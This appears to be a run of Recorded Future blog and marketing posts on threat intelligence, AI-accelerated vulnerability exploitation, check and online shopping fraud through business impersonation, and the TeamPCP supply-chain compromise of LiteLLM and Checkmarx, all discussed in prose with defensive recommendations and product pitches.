The goal for most organizations isn’t to replace their security stack. It’s to make it work better. By enabling intelligence to act autonomously, connecting visibility across domains, and aligning security operations with the speed of modern threats, organizations can close the gap that has long existed between insight and action. Recorded Future is built to make that possible.

If your team is still struggling with alert fatigue, delayed responses, or fragmented visibility, the issue may not be a lack of resources. It may be a limitation in how intelligence is being applied.

Now is the time to rethink that model.

Connect with Recorded Future to see how autonomous defense can help your organization move at the speed of today’s threats—and stay ahead of what comes next.

Contact us

Over the last decade, connectivity has expanded, yet the world has become more fragmented. Our everyday lives are more digital, but we spend more time parsing text messages for scams or deliberating the authenticity of potential deepfakes. Technology is delivering great productivity gains to small businesses while making them a larger target for cybercriminals.

In this environment, exposure becomes the default: Access points are growing, control is hard and reacting to change stops working. AI intensifies these dynamics because it compresses time for everyone, including adversaries.

Today, trust has become the most critical tool to move all businesses forward. Without trust, even the best ideas stall. People hesitate, adoption slows and growth stagnates.

Trust used to be something businesses tried to repair after a breach. Now it must be the starting point, and something to nurture and continuously prove in a world that has fundamentally changed.

It would be impossible to eliminate the risk entirely. Some estimates project cybercrime could cost the world $15.6 trillion annually before 2030, surpassing all but two of the world’s largest economies. Instead, the goal must be to build the ability to see sooner, decide faster and limit impact when, not if, something breaks. Trust today is all about bringing together speed, intelligence and collaboration, and that’s exactly what we’re developing across our teams.

Getting this right isn’t just good business sense, but the only way to ensure new technologies are embraced and economies can keep growing.

The advantage is intelligence

Real advantage comes from understanding context and connecting signals across systems. That’s what turns data into better decisions. This kind of intelligence increases speed, reduces risk and enables proactive action. With the right intelligence, teams can hunt for threats continuously, test assumptions and act before harm occurs, not just triage alerts after the fact.

You can see this shift in how the payments industry is evolving, including the work we’re doing by bringing Recorded Future’s threat intelligence together with Mastercard’s security capabilities, payments infrastructure and partnership models. We’re helping organizations understand where risk concentrates, how it propagates, and how quick, collective action can reduce the cost of cybercrime.

Faster insights mean earlier action, which minimizes impact — and deepens trust.

Trust is built through collaboration

Security doesn’t scale through isolated heroics. It scales through ecosystems: shared signals, shared standards and partners who can move together as new threats arise, attack vectors shift and failures spread.

Resilience is strongest when public and private sectors plan, exercise and respond together, rather than in parallel. Different players have different sightlines in the digital ecosystem. Startups look at the edges of innovation. Enterprises understand the realities of operating in today’s environment. Governments see where systemic risk concentrates. When those visions combine, our shields strengthen and expand, pushing cybercriminals out of the frame.

During our time here in Miami for the eMerge Americas conference, we’ve had the opportunity to speak to enterprises, startups, investors and government leaders about the need to accelerate resilience in Latin America, where the digital economy is booming but security hasn’t always kept pace. The region has the world’s fastest-growing rate of disclosed cyber incidents — in 2025 alone, Recorded Future tracked 452 ransomware incidents — but only seven countries have developed cybersecurity plans protecting critical infrastructure, and only 20 have formal computer security incident response teams.

That gap is where trust breaks, and where more collaboration can become a growth necessity. We can’t build sustainable economic growth in Latin America without building digital trust and cyber resilience. That’s why we are deepening our footprint here, enhancing regional threat intelligence and resilience and paving the way for stronger public-private collaboration to address these complex risks.

Secure digital access unlocks economic opportunity — and insecurity shuts it down fast. For a first-time digital user, one fraud incident can be enough to opt out for good. For a small business, one account takeover can wipe out months of progress. That’s why trust is inextricably linked to financial health. People can’t build stability on top of systems they’re afraid to use. At Mastercard, we’ve committed to connecting and protecting 500 million people and small businesses by 2030, because secure participation is foundational, not optional.

The bar for digital innovation today is not what we can deliver, but what people will trust enough to use, depend upon and harness for their own financial health. Because in the end, trust is the superpower.

For defenders, the timeline for determining which vulnerabilities matter most and remediating them before exploitation begins is narrowing, even as the overall volume of vulnerabilities rises. Organizations that rely on manual prioritization, slow patch cycles, or legacy software will face growing operational and security risks.

Figure 1: Reality versus hype of automated vulnerability research

The Vulnerability to Exploit Ratio

Vulnerabilities are software flaws attackers can use to gain access, run malicious code, escalate privileges, or disrupt operations. However, not every bug becomes a real-world threat: many are hard to reach, difficult to weaponize, or simply not worth an attacker’s time.

The total number of disclosed vulnerabilities has increased sharply in recent years, rising from roughly 21,000 in 2021 to nearly 50,000 in 2025. Part of that increase likely reflects stronger disclosure practices and bug bounty activity, though software growth, a broader attack surface, and more systematic reporting also play a role. Nonetheless, in 2025, Recorded Future only identified 446 vulnerabilities that were actively exploited in the wild, a reminder that confirmed exploitations remain a small fraction of total disclosures.

Figure 2: Yearly comparison of disclosed CVEs against CVEs with public exploits and vulnerabilities assessed as actively exploited by the Cybersecurity and Infrastructure Agency’s Known Exploited Vulnerabilities (KEV) Catalog and Recorded Future, 2021-2025

This is because attackers do not exploit every bug they find. Instead, they focus on developing exploits for the small subset of vulnerabilities that offer the best combination of reach, reliability, and return on investment, such as flaws that can be exploited remotely or affect widely used software. In other words, a vulnerability still has to be validated, turned into a reliable exploit, matched to a target, and integrated into an attack path worth the effort.

When a flaw matches the criteria, however, exploitation can move quickly. VulnCheck found that nearly 29% of KEVs in 2025 were exploited on or before CVE publication, a slight increase from the previous year, indicating the continued prevalence of zero-days and n-days. Much as their legitimate counterparts use AI in software development, adversaries are already using AI to accelerate parts of the attack workflow, including vulnerability research, exploit-path analysis, and malware development, even if its precise effect on exploitation timelines is hard to quantify. Some trackers estimate the median time-to-exploit may now be measured in hours rather than days, demonstrating the shortening window of time to act on a high-impact vulnerability.

How AI Changes the Equation

Anthropic and OpenAI recently drew significant attention through their limited release of what they claimed were uniquely powerful cyber defense models. An independent evaluation of Anthropic’s Mythos found significant improvements in multi-step cyberattack simulations. However, AI-assisted vulnerability discovery and penetration testing predate these models, and most frontier models have already demonstrated the ability to identify vulnerabilities and assist with exploit development. At present, these tools are still most effective in the hands of capable operators rather than enabling frictionless, low-skill exploitation at scale. This matters, too, as even if these capabilities are used primarily by security researchers in the near term, the resulting increase in disclosures, proofs of concept, and validated findings still adds to the defensive burden.

This impacts vulnerability management in three important ways:

• More credible vulnerability reports to triage: New agentic systems can do more than flag suspicious code; they can reason through program behavior, validate findings, and help identify which weaknesses appear most exploitable.
• Less time to mitigate exploitable vulnerabilities: Large-language models (LLMs) are accelerating the speed and scale of weaponization, meaning the path from disclosure to exploit could go from hours to minutes.
• Reduced the cost of exploit development: Emerging models appear more capable of producing proof-of-concept exploit code, testing attack paths, and helping skilled operators iterate toward weaponizable exploits faster than before.

Figure 3: The vulnerability equation: How automated capabilities will likely impact reporting, exploit development, and impact

More Reports, More Noise

Using AI agents for software code will almost certainly increase the number of reported vulnerabilities and developed proofs-of-concept. Microsoft’s April 2026 Patch Tuesday, which followed Anthropic’s Project Glasswing announcement, was the company’s second-largest on record. However, according to Microsoft, it “does not reflect a significant increase in AI‑driven discoveries, though [they] did credit one vulnerability to an Anthropic researcher using Claude.” The more important question is not whether more flaws will be found — because they will be — but whether defenders can process, validate, and prioritize them fast enough to act.

Vulnerability submissions are already overwhelming researchers’ ability to assess their overall risk, creating a backlog of vulnerability enrichment and scoring. If AI sharply increases the volume of plausible findings, defenders will face even more uncertainty around which vulnerabilities represent the next high-impact systemic event and which are background noise.

Less Time to Act

For the vulnerabilities that are actually a problem, defenders have even less time to respond. Automated exploit development will likely shorten the path from discovery to proof of concept and, in some cases, to weaponization for the subset of vulnerabilities worth pursuing. Adding to the triage problem, some medium-severity or otherwise “non-critical” vulnerabilities will need to be re-evaluated as possible components of exploit chains, even if they would not normally rank as urgent on their own.

Drowning out the Alarms

Even as defenders deal with more noise, a larger volume of reported, plausible findings is likely to increase the absolute number of high-impact exploits they need to address quickly. As a result, defenders face an even greater challenge in identifying the small subset of issues that matter most before attackers do.

This does not mean every newly disclosed flaw will be weaponized, or that high-impact, “internet-breaking” events will become commonplace; however, even a modest increase in exploited vulnerabilities puts more pressure on prioritization, patching speed, and compensating controls, especially for organizations already struggling with manual triage, slow patch cycles, or legacy software.

How to Use Automation for Good

For most organizations, the immediate risk is not that every vulnerability will suddenly be exploited, but that defenders will have less time to determine which findings matter most. Vulnerability discovery and exposure management should therefore be treated as related but distinct problems: AI may increase the number of findings, but defenders still need context to determine which exposures are actually reachable, high-impact, and worth urgent remediation.

In this environment, using AI-enabled vulnerability discovery, prioritization, and defensive remediation will be essential to keeping pace with attackers. The five actions listed in the following section can help organizations stay ahead of the threat.

1. Automate Vulnerability Prioritization and Response

Shift from CVSS-only scoring to real-time exploitability and exposure-based risk scoring to handle the surge in AI-assisted vulnerability discovery. Deploy automated scanning, validation, and threat hunting to identify exploitation activity quickly, especially in widely used software and internet-facing systems. Recorded Future’s Insikt Group regularly reports on new vulnerabilities and exploit trends and develops Nuclei templates to detect actively exploited vulnerabilities.

2. Accelerate Patching and Upgrade Cycles

As the time to exploit shifts from days to hours, the time to mitigate vulnerabilities will similarly shorten. Patch management will need to move faster, particularly for internet-facing systems, widely used software components, and critical dependencies. Automated remediation and automated compensating controls will likely become necessary to keep pace with AI-accelerated discovery. The Vulnerability Intelligence module in the Recorded Future Intelligence Operations Platform can help with prioritization based on the likelihood of exploitation. Ensure all automated actions are logged and regularly audited by a human, and require a human-in-the-loop for any actions on high-impact systems.

3. Reduce Dependence on Legacy and Unsupported Software

AI may make it easier for threat actors to identify and validate exploitable weaknesses in older, under-maintained codebases. Unsupported systems and aging software are likely to become increasingly difficult to justify unless they are strongly isolated and tightly controlled.

4. Shift Vulnerability Detection Earlier in the Software Lifecycle

Organizations should integrate automated security testing and AI-assisted vulnerability discovery into development pipelines. Early detection can help defenders fix vulnerabilities before production, reducing remediation burden later.

5. Get Ready for the Next High-Impact Event

Develop emergency response and mitigation playbooks specifically for high-impact, broadly applicable flaws, including scenarios where a patch is not immediately available. Preparation should include not just patching, but also containment measures such as segmentation, access restrictions, traffic filtering, and other compensating controls.

Threat intelligence can elevate cybersecurity programs from reactive to autonomous, transforming workflows and delivering measurable improvements. In a recent webinar, we shared practical steps for integrating threat intelligence into existing security stacks, optimizing workflows, and accelerating organizational maturity in cybersecurity practices.

Read on for actionable insights, frameworks, and tools shared during the session.

Bridging the gap: threat intelligence integration

The key to effective threat intelligence is making your tools work together seamlessly. Recorded Future doesn’t aim to replace your existing cybersecurity tools, but rather to enrich and connect them.

When Recorded Future connects to the tools already in your stack, it automatically adds contextually relevant threat intelligence to whatever you're working on. This can mean less manual effort and faster, better-informed decisions.

Understanding your organization’s cyber maturity

A useful starting point is assessing where your organization currently stands across four stages of cybersecurity maturity: reactive, proactive, predictive, and autonomous:

1. Reactive organizations focus on responding to incidents as they occur.
2. Proactive organizations hunt for threats before they lead to incidents and align detection systems to adapt toward emerging risks.
3. Predictive programs extend threat intelligence beyond the security operations center (SOC) to other organizational stakeholders.
4. Autonomous programs leverage automation to identify and respond to threats in real time at machine speed.

Maturity doesn't have to be assessed at the program level alone. Individual use cases may be at different stages. Alert management, for instance, may already be highly automated, while other workflows remain more reactive.

A helpful way to identify where to focus is to ask a series of questions, including:

• What does my current alert workflow look like?
• What's my most time-consuming process?
• What's my top priority for the next 12 months?

Your answers will enable you to identify areas for improvement and then prioritize your workflows as needed.

Three key integration workflows—and one bonus workflow

Next, we suggest integration workflows that are designed to help you optimize your security operations with Recorded Future threat intelligence:

1. Indicator of compromise (IOC) enrichment

Detection tools often generate alerts with limited context, leaving you asking why something was flagged and how risky it actually is.By integrating Recorded Future, you’ll find that those alerts can be automatically enriched with information such as malware families, exploited vulnerabilities, and threat actor connections—enabling better, faster decisions without additional manual research.

2. Vulnerability prioritization

Most organizations depend on CVSS scores or vendor-provided data to assess vulnerabilities, but that approach doesn't always reflect real-world risk. A more effective strategy is asking: Is this vulnerability being actively exploited in targeted campaigns? Are threat actors targeting my industry with it?

Recorded Future enhances vulnerability management primarily through threat intelligence context, with risk scoring that tells you why something is risky—specifically whether a CVE is being actively exploited in the wild, and whether it's targeting organizations in your industry.

3. Autonomous Threat Operations

The most advanced workflow involves automating threat detection and prevention from end to end. Recorded Future can identify emerging threats, initiate retroactive threat hunts, and automatically update detection and blocking lists in tools like EDR platforms—all without manual intervention. This will enable your security team to shift from reactive firefighting to real-time, autonomous threat prevention. Learn more about Autonomous Threat Operations, available in Recorded Future’s Professional and Elite pricing packages.

4. Bonus workflow: Watch list automation

Your existing vulnerability scanners like Tenable, Qualys, Wiz, and Rapid7 are already identifying vulnerabilities in your environment. A Watch List automation connector can link those tools directly into Recorded Future's Watch Lists, so the Platform automatically reflects your real threat footprint at all times. Instead of tracking a static list of top vulnerabilities, you get contextual intelligence tied to what's actually in your environment, and you're automatically alerted when vulnerabilities change in risk status.This shifts vulnerability management from a reactive posture to a predictive one, and makes prioritization effectively autonomous.

The role of Recorded Future’s Integration Center

The Integration Center makes it straightforward to connect with popular security tools including Splunk, ServiceNow, CrowdStrike, and SentinelOne. Many of these integrations are pre-built and can be activated in just a few clicks, meaning there may already be value waiting to be unlocked within your existing SIEM, SOAR, EDR, TIP, vulnerability management tools, GRC platforms, and more.

Driving business value with integrated threat intelligence

Beyond operational efficiency, well-integrated threat intelligence workflows build organizational trust and give security leaders a stronger, data-backed narrative about how their teams are operating. Automating enrichment and response creates the space to focus on strategic priorities—and makes it easier to demonstrate the program's value to leadership.

The path toward autonomous threat operations requires sophisticated technology, seamless integrations, smart prioritization, and strategic planning. The best approach is simply to start: Activate a workflow, see the value it delivers, and build from there.

If you need help getting started or have questions about your organization’s specific needs, book a custom demo.

If you’re a millennial or Gen Z-er, then you probably haven’t used a paper check in a while. According to the Federal Reserve Bank of Atlanta, just 1 out of 5 of your peers used a check in the last 30 days, versus 2 out of 5 Gen Xers and 3 out of 5 boomers. Yet despite year-on-year decreases in overall usage, Nasdaq Verafin saw check fraud instances rise another 11% in 2025.

Then again, if you are a millennial or Gen Z-er, you will have seen an advertisement for a cheap product on social media. For 40% of you, that has meant falling for an online shopping scam.

On the face of it, these look like two ends of the fraud spectrum:

• On the one hand, we have what feels like the past: paper check usage rates even among those aged 65+ fell from 13% of transactions in 2013 to 6% in 2025 (Federal Reserve Bank of Atlanta).
• On the other hand, we have the future: online shopping scams target a younger demographic through AI-enabled brand impersonation and sprawling social media ad ecosystems.

The payment instruments, demographics, and the teams working at financial institutions to address these problems differ. So what’s the thread linking them together? Business impersonation. It manifests itself differently across schemes, but for anti-fraud systems built to detect check washing and counterfeiting on the one hand, and unauthorized third-party card fraud on the other, business impersonation has emerged as the fraudster’s response to exploit both.

Commercial checks and copycat businesses across state lines

In the past, stolen checks were often whitewashed to change the recipient and amount, and then walked into banks for cashout. The Postal Inspection Service received over 299,000 mail theft complaints in a single 12-month period—a 161% increase from the prior year. Recorded Future’s Fraud Intelligence Team analyzed and mapped stolen checks to US geographies, illustrating hot spots of physical crime and observing that it remains a national issue that extends beyond heavily urbanized areas.

Mapping stolen checks by zip code; courtesy of Recorded Future

Yet even among declining consumer check usage rates, businesses’ use of commercial checks remains stubbornly high in the US: the Association for Financial Professionals (AFP) found that 91% of organizations are still using checks, and 63% experienced check fraud in 2024. When businesses send checks to suppliers, the amounts can rise quickly, leading fraudsters to expand beyond simple check-washing schemes.

In perhaps the most eye-catching example, fraudsters intercepted a commercial check destined for bubble-gum giant Bazooka in 2022. A $1.24 million check. Over the next two weeks, they transferred and withdrew over half a million dollars. How’d they do it? You can’t just wash out the payee name on a million-dollar check, replace it with John Smith, and expect it to clear after depositing it into a personal checking account.

Instead, the threat actors just created a fake Bazooka. The real Bazooka is registered in Delaware under the name “The Bazooka Companies, LLC”, so culprits registered a fictitious company in New York under the name “The Bazooka Companies 1 Inc”. They then used the official business license to open a corporate bank account for the new fictitious business. From there, they used cashier checks, withdrawals, and transfers to personal accounts to cash out the funds.

Fast forward to today, and the scheme is still happening. Recent research from Recorded Future Payment Fraud Intelligence (PFI) surveyed stolen checks for sale on Telegram in Q4 2025 and found over 30 checks with a business as the payee, along with suspicious new entities registered in other states a few days later. The total face value of the checks amounted to $2M.

As with most fraud, this scheme’s emergence is based on:

• Exploiting ecosystem gaps between disparate parties: Businesses can have the same name as another when registered in different states. Pair that with most states’ limited mandate to investigate business registrations, and we’re left with the first gap:

“As long as the basic filing requirements are met, the office[s] may have little or no authority to question or reject a document submitted for filing or to verify information included in the filing” (National Association of Secretaries of State, September 2025)

When a fraudster approaches a bank to open a business bank account, the bank conducts its own due diligence. But the focus here is on money laundering threats and the legitimacy of documents and applicants. If the fraudsters are using a clean identity — synthetic or otherwise — then the bank won’t have a clear reason to reject the application just because a business called John’s Toilet Supply, LLC exists in another state.

• Delivering a reactionary counterpunch to effective fraud processes: Think of this as the cat-and-mouse game. Fraud defenders figure out how to stop one scheme, forcing fraudsters to innovate. In this case, Positive Pay has proven remarkably effective at preventing check washing and counterfeit checks (when parties agree to use it). Payee Positive Pay, in particular, allows the payer to make sure that when their checks are deposited, the check number, date, payee name, and amount match their files. But what happens if everything is correct, but a copycat payee deposits the check? Cases like Bazooka.

80% discount on shoes? How can you say no?

If we detour into e-commerce, we see a very similar dynamic play out, but at a staggeringly larger scale. The premise is simple: use AI to launch a fake online shop impersonating company A, B, or C, buy ad space on social media to drive traffic, pocket the proceeds, and launder the funds while customers wait for goods that never arrive.

The scheme works because 53% of consumers, and 76% of Gen Zers, now begin shopping journeys on social media, according to Salesforce’s 2025 report. The problem is that the journey is littered with traps: in November 2025, leaked internal documents from Meta claimed the “company shows its platforms’ users an estimated 15 billion ‘higher risk’ scam advertisements — those that show clear signs of being fraudulent — every day”. Industry reporting paints the same picture, with the Better Business Bureau finding online shopping scams as the most reported scam type and social media advertisements as the most common originator.

The basics of the scheme are nothing new. Capture payment card data by creating a fake online store and advertise too-good-to-be discounts. What’s changed is that these are no longer just phishing websites. They’re functional online shops that process payments via merchant accounts. Behind each of these merchant accounts is a registered business.

This is creating problems throughout the ecosystem:

• Cardholders see websites that exactly mimic major (and increasingly niche) brands, letting discounts outweigh better judgment.
• Financial institutions face the challenge of balancing their duty of care to process customer transactions with the risks of fraud and money laundering. But in these cases, the traditional indicators of cyber-enabled fraud aren’t present. The cardholder is authorizing the transaction, and there’s nothing suspicious within the behavioral or device indicators of the 3D Secure authentication stream. (Because, again, it’s the cardholder doing the transacting under manipulation.)
• The fingers begin to point back at the acquirers and payment facilitators responsible for merchant onboarding, but, from their perspective, the entity holds a proper commercial license to engage in business issued by the local authorities. (Though, as a divergence from the check fraud scheme, the fraudsters in online shopping scams rarely impersonate a real big-name brand at the business creation and merchant onboarding stage. Instead, the fraudsters hide evidence of impersonation from the merchant onboarders and leave the impersonation for the ads and fake online shops visible to victims.)

But just like with the check fraud example, a big part of why online shopping scams have exploded — outside of generative AI making brand abuse content easier than ever to create at scale — is ecosystem gaps and fraudsters reacting to the defense:

• Exploiting ecosystem gaps between disparate parties: By the time a victim is making a purchase on an online shopping scam website, each entity along the way has looked to the one before and trusted that due diligence had been performed. The cardholder wants to trust that the social media platform screened out malicious advertisers; the card issuer wants to trust the cardholder vetted the merchant; the card network wants to trust the merchant onboarder verified the business; and the merchant onboarder wants to trust local authorities properly licensed the business. A big, long line of incentivized trust.
• Delivering a reactionary counterpunch to effective fraud processes: The industry has made huge strides in combating unauthorized, third-party card-not-present (CNP) fraud in the last decade. A major part of the success has been built on 3D Secure, introducing a layer of authentication on top of existing authorization controls. Online shopping scams completely sidestep the defensive layer by making the merchant the fraud surface and rendering cardholder authentication controls irrelevant.

Thinking towards the way out

On the check fraud side, the best solution may already be available, but, as with most solutions, it comes with trade-offs and adoption issues. The basic idea of Positive Pay and its derivative, Payee Positive Pay, is that a business informs its bank of the checks it is sending, and the bank only disburses funds if the check matches what the business provided. Positive Pay was designed to combat counterfeit and forged checks, and it does that very well.

Of course, in the Bazooka example of same-name business impersonation, this wouldn’t help. Nothing about the check was modified. So here, banks offer Reverse Positive Pay, which basically means the business personally signs off on each sent check. It can solve the problem but shifts more operational and investigatory expenses onto the business (which might explain why adoption rates are south of 20%, according to Datos Insights and Alkamai). In the end, though, it makes you wonder why not heed the advice and move to alternative electronic payment methods?

On the online shopping scam side, solutions are more complex and scattered across the ecosystem.

• At the top of the funnel, there’s rising pressure on online advertising platforms to do a better job at limiting the presence of fraudulent advertisements. Based on more leaked internal Meta documents, regulatory pressure may not be producing the desired outcome.
• At the merchant onboarding level, both the major card networks are forcing acquirers and payment facilitators to do more to defend the gates into payment processing, while also devoting more resources to identifying scam merchants that do make it in.

For card issuers on the frontline, it’s a more delicate dance. Card issuers aren’t on the hook for authorized card payments to fraudsters under the Fair Credit Billing Act (FCBA) or Electronic Funds Transfer Act (EFTA), but 67% of cardholders expect them to cover scam losses. Though when cards transacting on scam websites end up on the dark web for resale, and unauthorized charges start rolling in, it is the issuer’s problem.

The best solution aligns with the industry’s movement toward CTI-fusion models to address the cyber component of cyber-enabled fraud. The convergence of online shopping and purchase scams is precisely the type of problem the new organizational model was meant to combat.

In applying the CTI-fraud fusion model to purchase scams, traditional fraud assets start at the end of the fraud attack chain to correlate reported cardholder manipulation and non-delivery alerts against merchant account patterns. The CTI assets start at the beginning, sourcing online shopping scams at runtime and attributing the abused merchant accounts. The two teams then meet in the middle, using modeled transaction patterns and threat-hunted active scam websites, ultimately leading to the deployment of merchant-based fraud risk rules.

So, in the meantime, where does all this leave us? The same thing you’ve heard plenty of times: stop using checks if you can and don’t trust too-good-to-be-true offers from online ads.

How Recorded Future Helps

The research in this blog came directly from Recorded Future's Fraud Intelligence teams. Two capabilities speak to the threats described.

• Payment Fraud Intelligence — tracks the complete fraud lifecycle: for check fraud, it uses OCR to extract payee, amount, and date from compromised checks being sold in forums, enabling deposit screening against known stolen checks; for card fraud, it monitors compromised merchants, stolen cards on criminal marketplaces, and the tester merchants fraudsters use to validate cards before striking.
• Digital Risk Protection — provides continuous monitoring across millions of sources for malicious sites, brand and executive impersonation, data leakage, and dark web mentions — with risk-based alerting that surfaces only actionable threats and takedown workflows built directly into the Platform.

In March 2026, a group calling itself TeamPCP compromised LiteLLM (a Python package with roughly 97 million monthly downloads used by thousands of organizations to connect to AI services) and Checkmarx (one of the most widely used application security testing platforms on the planet). How they got in isn’t publicly confirmed. But the result was write access to a trusted software repository.

From there, they injected a credential-harvesting payload into the software and poisoned two Checkmarx GitHub Actions workflows. The malware ran silently on installation, vacuuming up access keys, cloud credentials, secrets, and (the cruelest irony) every AI API key that LiteLLM was specifically designed to manage. The stolen data was encrypted, then pushed to a lookalike domain.

And here is the part that should keep you up at night: this was one campaign, by one group, in one week. The downstream consequences are still unfolding.

Identity Is the Perimeter (and the Attack Surface)

The throughline in the TeamPCP campaign is identity. Start to finish.

TeamPCP intelligence summary courtesy of Recorded Future.

No one has publicly confirmed exactly how TeamPCP gained access to the LiteLLM maintainer’s repository, but the most likely vector is stolen credentials. Recorded Future’s identity intelligence contains almost 1 million compromised GitHub developer credentials harvested by infostealers and sold across dark web marketplaces. A single publishing token or access key, lifted from a prior infection and left unrotated, would have been sufficient. TeamPCPs’ earlier compromise of Aqua Security’s Trivy infrastructure in late February (where incomplete credential rotation left residual access open for weeks) demonstrates exactly this pattern: one stolen token, one missed rotation, and the door stays open.

Whatever the precise mechanism, TeamPCP used valid credentials to push malicious code into trusted repositories. No firewall to bypass. No endpoint to exploit. Just a valid login and the implicit trust that comes with it.

Then the payload itself was designed to steal more identities. Each compromised environment yielded credentials that unlocked the next target. Trivy led to GitHub Actions. GitHub Actions led to four additional software distribution ecosystems. One incomplete incident response created a cascading chain of supply chain compromises across five ecosystems in five days.

This is the identity and access management problem stated as plainly as possible: if the perimeter is identity, then every stolen credential is a breach in the wall. And unlike a firewall rule, a stolen credential doesn’t trigger an alert. It just works.

We previously wrote about how deserialization vulnerabilities have plagued enterprise software for over a decade. The pattern is always the same: trusting input that should not be trusted. Supply chain attacks are the organizational equivalent. We trust the packages we install. We trust the pipelines we build. We trust the security tools we deploy. TeamPCP exploited every layer of that trust, starting with a single compromised identity.

The Impact Is Not Just Ransomware

TeamPCPs’ Telegram channel references a ransomware victim’s site. The group appears to operate as a ransomware affiliate and has publicly discussed extorting companies by threatening to release over 300 GB of stolen data. Reports indicate a possible collaboration with the Lapsus$ extortion group. Ransomware is the obvious play.

CipherForce intelligence summary courtesy of Recorded Future.

But ransomware is only the most visible impact. The more dangerous question is: what else can you do with over a million stolen cloud credentials, API keys, and service account tokens?

The answer, based on what Insikt Group is tracking across multiple unrelated campaigns, is far broader than encryption and extortion.

Redirect payroll. Late last year (2025) Insikt Group was monitoring activity around a campaign called “Swiper,” run by likely Russian-speaking actors who set up phishing infrastructure impersonating major financial institutions and payroll service providers. Stolen credentials were transmitted in real time, enabling the actors to alter direct deposit accounts and redirect payments before anyone noticed. The responsible actor was identified through a dispute on a criminal forum, and their cryptocurrency wallet has processed over 7,000 transactions. This was a credential theft operation that converted identity compromise directly into financial theft. Now imagine that same playbook amplified by a supply chain attack that harvests payroll platform credentials at scale.

Reroute shipments. Separately, Insikt Group has identified TAG-160, a threat group targeting the US logistics and transportation sector. TAG-160 impersonates logistics companies, sends fraudulent rate confirmations via phishing emails, and delivers remote access malware. But TAG-160 has also been caught running “double brokering scams,” where they pose as a legitimate carrier, obtain valid load details from a real broker, then re-advertise the load under the broker’s name to contract a different carrier. The legitimate carrier moves the freight. The threat actor collects the payment. The real carrier never gets paid. A second, unrelated threat cluster targets German logistics companies with a similar playbook.

These are not theoretical scenarios. They are active campaigns running in parallel with the TeamPCP supply chain compromises. And the common denominator across all of them is credential theft and identity abuse.

In the five risk impact categories we use as a framework for translating cyber threats into business risk, the TeamPCP compromise touches every single one: operational disruption (ransomware, system lockout), financial fraud (payroll redirection, double brokering fraud, extortion payments), competitive disadvantage (credentials, trade secrets, PII), brand impairment (customers learning their security tooling was the vector), and legal and compliance consequences (breach notification obligations, potential liability for downstream impacts).

The tendency is to categorize supply chain attacks as a “security tool problem” or a “developer problem.” It is neither. It is a business risk problem whose blast radius extends from IT operations to payroll to logistics to the boardroom.

Organizations should ask how they can use AI-driven analysis to continuously verify the integrity of every package and build artifact entering their production systems. This means comparing distributed packages against their source repositories to detect injected code. It means analyzing updates to flag anomalous changes in behavior. It means automated provenance verification that traces software from source to distribution, flagging breaks in the chain.

But the TeamPCP campaign exposed a truth the industry has been slow to internalize: the security tools themselves are targets. TeamPCP specifically chose a vulnerability scanner and an application security platform because those tools have the broadest access to credentials and infrastructure. Compromising the tool that checks your code is the ultimate fox-in-the-henhouse scenario.

The organizations that weather this era of supply chain risk will be those that treat code integrity verification as a continuous, automated, AI-augmented process rather than a periodic audit.

So What. Now What.

TeamPCP is not done. Their Telegram channel explicitly states the operation is still unfolding, and they claim to be working with new partners to monetize stolen data at scale.

For security leaders, the immediate actions are straightforward: if your organization uses LiteLLM, Trivy, or Checkmarx GitHub Actions, assume compromise and rotate every credential on affected systems. Audit your software pipelines for unauthorized changes. Pin software dependencies to verified, immutable versions.

But the longer-term lesson is more fundamental. Supply chain attacks convert the trust model of modern software development into an attack surface. The packages you install, the tools you run, the pipelines you build: these are not neutral infrastructure. They are vectors. And the credential stolen today from a compromised software package could show up tomorrow as a payroll redirect, a rerouted shipment, or a ransomware demand.

The keys to your kingdom are scattered across every package manager, every automation token, and every service account in your environment. Someone is collecting them. And your supply chain breach is already someone else’s payday.

How Recorded Future Helps

The TeamPCP campaign left signals at every stage. Three Recorded Future capabilities speak directly to this threat:

• Identity Intelligence — monitors infostealer logs, dark web markets, and credential dumps in real time, automatically detecting compromised employee credentials and triggering immediate response — including the nearly one million compromised GitHub developer credentials already in Recorded Future's dataset.
• Insikt Group — elite analysts with deep government, law enforcement, and intelligence agency experience who produced the TeamPCP, Swiper, TAG-160, and CipherForce research in this blog. Customers see threats as they develop, not after they've made headlines.
• Third-Party Risk — continuously monitors vendors for ransomware extortion activity, breach indicators, and credential leaks, replacing point-in-time questionnaires with real-time visibility across your supply chain.

The global threat landscape didn't simplify in 2025. It shattered. Recorded Future's Insikt Group® 2026 State of Security documented how geopolitical fragmentation, state-sponsored operations, and criminal ecosystem adaptation reshaped global risk. Threats that once stayed in distinct lanes converged, and they converged fast.

Consider what Insikt Group® tracked last year:

• State-sponsored cyber actors shifted from intelligence collection to persistent access, pre-positioning inside target infrastructure so they can disrupt operations the moment geopolitical tensions escalate.
• Weak governance and systemic corruption fueled industrialized cybercrime, enabling payment fraud and criminal operations to scale like legitimate businesses.
• Influence operators and hacktivist groups multiplied alongside rising interstate conflict, amplifying fear, uncertainty, and doubt through exaggerated exploit claims.
• Loosely organized criminal collectives used social engineering to compromise third-party SaaS platforms, rapidly adapting to law enforcement action and traditional defenses alike.

The risk surface has expanded well beyond networks and endpoints. Your brand, your third-party vendors, your payment networks: each has its own threat actors, its own attack methods, and its own intelligence requirements. Yet most intelligence programs only cover one of these domains. Or they monitor them in silos, with no shared context.

The right intelligence, from the right sources, at the right time, is a critical competitive advantage. But intelligence only matters if you can act on it across every critical risk domain before attackers reach their objective.

Re-Imagining How Intelligence Is Delivered And Operationalized

Historically, Recorded Future has been sold on a per-user and per-capability basis - a model that worked well in a simpler world where security teams were focused on solving the most urgent problem in front of them.

Today’s threat landscape is fast, more complex, and deeply interconnected. Customers are no longer looking for point solutions, they’re asking for a fundamentally different way to consume and operationalize intelligence.

Customers are asking us to provide:

• Complete capabilities to support use cases aligned with core risk domains.
• Democratized access to intelligence across teams, workflows and systems.
• A simplified and predictable way to purchase for ease of budgeting and adoption.

In response, we’ve re-imagined Recorded Future is delivered:

“Four Solutions. Three Packages. One Intelligence Foundation.”

A unified approach designed to scale with your organization, accelerate time to value, and embed intelligence into every decision that matters.

Four Solutions for Four Critical Risk Domains

Your threats span your infrastructure, your brand, your vendors, and your payment networks. Your intelligence should too. We’ve re-organized our platform into four purpose-built solutions tied to distinct domains of enterprise risk.

Cyber Operations gives your security team the intelligence, workflows, and autonomous actions to detect, investigate, and respond to threats targeting your infrastructure. Alert triage, real-world vulnerability prioritization, malware analysis, proactive hunting: this is where reactive firefighting becomes predictive, intelligence-led defense.

